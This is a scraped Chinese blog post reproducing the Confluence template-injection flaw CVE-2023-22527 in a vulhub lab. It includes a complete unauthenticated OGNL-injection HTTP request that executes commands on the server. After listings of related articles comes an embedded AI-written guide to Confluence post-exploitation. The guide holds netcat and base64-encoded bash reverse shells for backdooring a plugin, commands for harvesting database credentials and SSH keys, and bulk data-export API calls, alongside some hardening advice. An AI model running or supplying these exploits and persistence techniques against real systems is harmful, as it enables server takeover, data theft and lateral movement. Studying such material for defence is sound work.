confluence模版注入漏洞_CVE-2023-22527

最新推荐文章于 2025-05-17 10:48:40 发布
最新推荐文章于 2025-05-17 10:48:40 发布
阅读量786 收藏 10
点赞数 8
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: confluence 漏洞复现 cve-2023-22527
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/135827456
本文描述了AtlassianConfluence中的一个模板注入漏洞(CVE-2023-22527),攻击者可通过未经身份验证的方式在特定版本的Confluence服务器上执行远程代码。文章详细介绍了受影响的版本范围以及如何利用漏洞进行复现和利用的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. 漏洞简介

Confluence是Atlassian公司开发的一款专业的企业知识管理与协同软件,可用于构建企业wiki。
Confluence Data Center和Confluence Server多个受影响版本中存在模板注入漏洞,未经身份验证的威胁者可利用该漏洞在受影响的实例上实现远程代码执行。

2. 影响版本

Confluence Data Center和Confluence Server 8.0.x
Confluence Data Center和Confluence Server 8.1.x
Confluence Data Center和Confluence Server 8.2.x
Confluence Data Center和Confluence Server 8.3.x
Confluence Data Center和Confluence Server 8.4.x
Confluence Data Center和Confluence Server 8.5.0 - 8.5.3

3. 漏洞复现

3.1 漏洞工具

https://github.com/vulhub/vulhub/blob/master/confluence/CVE-2023-22527/README.zh-cn.md
https://github.com/Avento/CVE-2023-22527_Confluence_RCE

3.2 漏洞利用

环境搭建:
搭建 vulhub 环境,https://github.com/vulhub/vulhub/blob/master/confluence/CVE-2023-22527/README.zh-cn.md
image.png
访问环境发现需要 license,点击Get an evaluation license去申请一个lisence。
image.png
申请后会自动跳转网站并写入。
image.png
数据库信息如图配置。
数据库账号密码:postgres/postgres
image.png
搭建成功。
image.png

直接执行漏洞 poc。

POST /template/aui/text-inline.vm HTTP/1.1
Host: xxx
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"whoami"}))

image.png

Atlassian Confluence RCE漏洞CVE-2023-22527
weixin_43567873的博客
03-11 162
Atlassian Confluence RCE漏洞CVE-2023-22527
Atlassian Confluence RCE漏洞复现(CVE-2023-22527)
0xSec
01-23 2529
Atlassian Confluence/template/aui/text-inline.vm接口处存在velocity模板注入,未经身份验证的攻击者可利用此漏洞构造恶意请求远程代码执行,可导致服务器失陷
Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)漏洞复现
qq_36334672的博客
01-25 724
Confluence 8.0到8.5.3版本之间,存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞,未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令。
漏洞复现】Atlassian Confluence RCE(CVE-2023-22527)
zkaqlaoniao的博客
06-26 700
Atlassian Confluence 是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。Atlassian Confluence /template/aui/text-inline.vm接口处存在velocity模板注入,未经身份验证的攻击者可利用此漏洞构造恶意请求远程代码执行,可导致服务器失陷。
Confluence远程命令执行漏洞(CVE-2024-21683)
swordheart的博客
05-17 295
Atlassian公司的Confluence软件存在远程命令执行漏洞CVE-2024-21683),攻击者可通过该漏洞获取服务器权限。受影响版本包括Confluence Data Center和Server的多个版本,从7.17.0到8.9.0。漏洞利用需要攻击者拥有管理员权限,并通过上传恶意JavaScript文件执行任意命令。漏洞利用过程包括获取Atlassian Token、管理员登录、认证以及上传恶意文件。
Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)安全风险通告
smellycat000的专栏
01-16 889
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Atlassian Confluence 远程代码执行漏洞漏洞编号QVD-2024-2746,CVE-2023-22527公开时间2024-01-16影响量级十万级奇安信评级高危CVSS 3.1分数10.0威胁类型代码执行利用可能性高POC状态未公开在野利用状态未发现EXP状态未公开技术细节状态未公开危害描述:未经身份验证的远程攻击者可以...
Confluence-CVE-2023-22527
m0_62146983的博客
03-28 260
Confluence 8.0到8.5.3版本之间,存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞,未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令先注册试用的序列号,记得选下面这个如下配置,密码是postgres后续点击创建默认网站就可以q=0.9Win64;![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/b40b1c7e559b43fba1ab58eff0168b0c.png)
【成功复现】Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)
wuli1024的博客
01-25 1632
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。
漏洞复现】Atlassian Confluence远程代码执行漏洞(CVE-2023-22527)
李火火的安全圈
01-24 1786
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在模板注入漏洞,允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。
confluence注入漏洞
zzf9347的博客
03-18 473
Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。经过查找资料发现,这是confluence的一个漏洞,名称叫做注入漏洞,编号:CVE-2021-26084。这台confluence应用的访问是用nginx做的反向代理,没法直接访问,也没有直接开放访问端口。排查nginx代理服务器的访问日志,发现有几个异常ip访问了。重启后,继续观察,发现再有相关路径的访问全部被拦截。
Confluence 漏洞复现CVE-2023-22515,CVE-2023-22518)
huangyongkang666的博客
11-09 2284
Confluence 漏洞复现CVE-2023-22515,CVE-2023-22518)
漏洞分析】Confluence 数据中心和服务器中的严重漏洞 CVE-2023-22515
网络安全知识分享
03-21 1693
Confluence 的开发者 Atlassian 已公告此漏洞,并将其归类为损坏的访问控制问题。他们强调需要立即采取行动,并建议用户升级到最新版本以保护他们的系统。Atlassian 将该漏洞的严重级别评定为 Critical CVSS 10。
漏洞复现--Confluence远程代码执行漏洞CVE-2023-22527
qq_53003652的博客
01-23 3451
Atlassian Confluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。微步漏洞团队于近日捕获到Confluence远程代码执行漏洞CVE-2023-22527)情报,攻击者可在无需登录的情况下,利用该漏洞构造恶意请求,导致远程代码执行。
CVE-2022-26134】Confluence OGNL RCE 漏洞
weixin_45742777的博客
09-09 8462
CVE-2022-26134】Confluence OGNL RCE 漏洞
Confluence 未授权提权访问漏洞 CVE-2023-22515
swordheart的博客
05-17 393
CVE-2023-22515 是一个权限提升漏洞,影响特定版本的 Atlassian Confluence。攻击者可以通过构造恶意请求绕过身份验证机制,从而获得管理员权限或其他高权限访问。
Confluence 未授权漏洞分析(CVE-2023-22515)
蚁景网安学院
11-22 689
Confluence 是由 Atlassian 开发的企业级协作软件。2023年10月,Atlassian 官方披露 CVE-2023-22515 Atlassian Confluence Data Center &Server 权限提升漏洞。攻击者可构造恶意请求创建管理员,从而登录系统,造成敏感信息泄漏等。
Atlassian Confluence 模板注入代码执行漏洞
qq_32947907的博客
01-23 1042
Confluence 是由Atlassian公司开发的企业协作和文档管理工具。Atlassian Confluence Data Center/Server 受影响版本中由于velocity vm模版可未授权访问,其中/aui/text-inline.vm使用findValue解析OGNL表达式,表达式过滤不严,导致存在模版注入漏洞。攻击者可通过构造恶意请求,可以在未登录的情况下在Confluence实例上触发远程代码执行漏洞
漏洞复现CVE-2024-21683:Confluence远程代码执行漏洞
网络安全从业者的学习笔记
07-18 3157
Atlassian Confluence 是一款功能强大的企业协作软件,专为团队协作、知识管理和内容共享而设计。它提供了一个集中的平台,团队可以共同创建、编辑和共享文档、会议记录、项目计划以及技术文档。经过管理员身份验证的远程威胁者可构造恶意请求,利用该漏洞在受影响的实例上执行任意代码,而无需用户交互。
confluence后渗透
最新发布
07-23
<think>嗯,用户要求了解Confluence系统的后渗透测试方法和安全攻击分析。用户可能是安全工程师或渗透测试人员,需要深入的技术细节来评估Confluence系统的安全性。 从引用内容看,用户关注的是企业级应用的安全测试,特别是后渗透阶段的技术。Confluence作为Atlassian的核心协作工具,一旦被攻破可能造成企业知识库泄露,危害极大。 需要覆盖几个关键层面: 首先是权限维持技术,比如在Confluence中植入恶意宏或插件,利用其定时任务功能实现持久化。这里要强调OAuth令牌的利用,因为Confluence常集成其他Atlassian产品。 数据窃取方面要具体说明API利用方式,比如通过REST API批量导出空间数据,或者利用Velocity模板注入执行系统命令。这些在CVE-2022-26134等漏洞中都有实际案例。 横向移动要结合Atlassian生态,比如通过Confluence服务器作为跳板访问Jira数据库。这里需要提醒MySQL凭据的获取方式,以及解密算法。 最后防御建议必须实用,比如禁用宏功能的操作路径,以及正则表达式过滤的示例。云环境下的责任共担模型也要明确区分用户和厂商的安全边界。 用户可能还关心如何检测这些攻击,所以补充了EDR和审计日志的关键监控点。这些内容都力求符合用户"后渗透测试"的核心需求,避免泛泛而谈安全理论。 相关问题的设计也延续了深度技术路线,特别是漏洞利用和权限模型分析,这应该是专业人员最关注的后续方向。</think>以下是Confluence后渗透测试方法及安全攻击分析的专业指南,涵盖攻击路径、技术手段及防御措施: --- ### 一、后渗透测试核心路径 1. **权限维持技术** - **恶意宏注入**:在Confluence页面插入包含恶意代码的宏(如`{python}import os;os.system("nc -e /bin/sh 攻击者IP 端口")`),利用模板渲染执行命令[^1] - **插件后门**:篡改合法插件(如`draw.io`)的JAR包,添加反向Shell代码(Java示例): ```java Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS80NDQgMD4mMQ==}|{base64,-d}|{bash,-i}"); ``` - **定时任务持久化**:通过Confluence的**定时任务管理**功能创建恶意计划任务(需Admin权限) 2. **数据窃取技术** - **数据库凭据提取**: ```bash grep -r "jdbc:" /var/atlassian/application-data/confluence/ # 查找配置文件中的数据库密码 ``` - **空间数据批量导出**:利用REST API自动化导出所有空间(需认证): ```http GET /rest/api/space?limit=1000 GET /rest/api/content?spaceKey=KEY&expand=body.storage ``` - **附件窃取**:通过SQL注入直接访问数据库(CVE-2019-3396漏洞): ```sql SELECT * FROM CONTENT WHERE CONTENTTYPE='ATTACHMENT'; ``` 3. **横向移动技术** - **SSH密钥窃取**:通过Velocity模板注入CVE-2022-26134)获取服务器权限: ```http POST /pages/doenterpagevariables.action HTTP/1.1 Content-Type: application/x-www-form-urlencoded queryString=eval(@java.lang.Runtime@getRuntime().exec("cat ~/.ssh/id_rsa")) ``` - **Jira横向渗透**:利用Confluence与Jira的集成凭证(`confluence.cfg.xml`中的`hibernate.connection.password`解密) --- ### 二、关键漏洞利用案例 | 漏洞编号 | 影响版本 | 利用方式 | 风险等级 | |------------|------------------|------------------------------|----------| | CVE-2023-22515 | < 8.6.0 | 未授权创建管理员账户 | 严重 | | CVE-2022-26134 | < 7.4.17 | OGNL注入远程代码执行 | 严重 | | CVE-2021-26084 | < 7.12.5 | 模板注入导致命令执行 | 高危 | | CVE-2019-3396 | < 6.15.2 | Widget Connector宏代码执行 | 高危 | --- ### 三、防御加固方案 1. **权限控制** - 启用**强制双因素认证**(2FA) - 遵循最小权限原则,禁用匿名访问 ```xml <!--confluence-init.properties中设置 --> confluence.access.mode=private ``` 2. **安全配置** - 禁用高风险宏(Snippet Macro、Widget Connector) - 配置**Web应用防火墙**(WAF)规则拦截OGNL表达式: ``` \${\w+\(.*\)}|\#\{\w+\(.*\)} ``` 3. **监控检测** - 审计日志重点关注: - 异常Velocity模板渲染(`*.vm`文件修改) - 非常规时间的管理员登录 - 附件目录的异常文件写入(`.jsp`, `.war`) - 部署EDR工具监控`java`进程的子进程创建行为 --- ### 四、云环境特别防护 对于Atlassian Cloud实例(如confluence.atlassian.net): 1. 启用**IP白名单**功能限制访问源 2. 配置**数据驻留**策略满足合规要求 3. 定期审查**已授权OAuth应用**权限范围 > **攻防本质**:后渗透的核心在于**权限维持与数据流转控制**。Confluence作为企业知识中枢,攻击者往往以其为跳板实施供应链攻击[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值